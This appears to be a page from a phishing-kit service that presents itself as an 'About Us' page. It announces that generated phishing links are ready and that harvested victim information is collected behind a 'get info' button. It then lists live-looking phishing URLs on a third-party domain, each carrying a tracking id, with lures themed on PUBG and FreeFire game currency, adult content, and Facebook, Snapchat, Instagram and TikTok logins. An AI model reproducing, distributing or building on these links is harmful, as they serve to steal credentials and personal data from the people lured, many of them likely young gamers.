hello world...

once you visit this "About Us"  page

you'll get all of the generated phishing links...


whenever you gather someone else's  information...
of victim it would be saved to the get info button...


Phishing Links :
~ Created Successfully 
~ Reception : get_info button.
 
• PUBG MOBILE ☠
~ Skin ⊱ https://dulliusimoveis.com.br/links/BM?nox=5626257080

~ UC ⊱ https://dulliusimoveis.com.br/links/MD?nox=5626257080

• BGMI ⊠
~ BV1 ⊱ https://dulliusimoveis.com.br/links/BG?nox=5626257080

• FOOT BALL ⊛
~ PS1 ⊱ https://dulliusimoveis.com.br/links/KO?nox=5626257080

• FreeFire ☃
~ EV1 ⊱ https://dulliusimoveis.com.br/links/FR?nox=5626257080

• SEX +18 ♕
~ XV1 ⊱ https://dulliusimoveis.com.br/links/SX?nox=5626257080

• facebook ✎
~ FV1 ⊱ https://dulliusimoveis.com.br/links/FC?nox=5626257080

• SnapChat ϗ
~ SV1 ⊱ https://dulliusimoveis.com.br/links/SN?nox=5626257080

• Instagram ⏣
~ GV1 ⊱ https://dulliusimoveis.com.br/links/IN?nox=5626257080

• tiktok ␢
~ TV1 ⊱ https://dulliusimoveis.com.br/links/TK?nox=5626257080
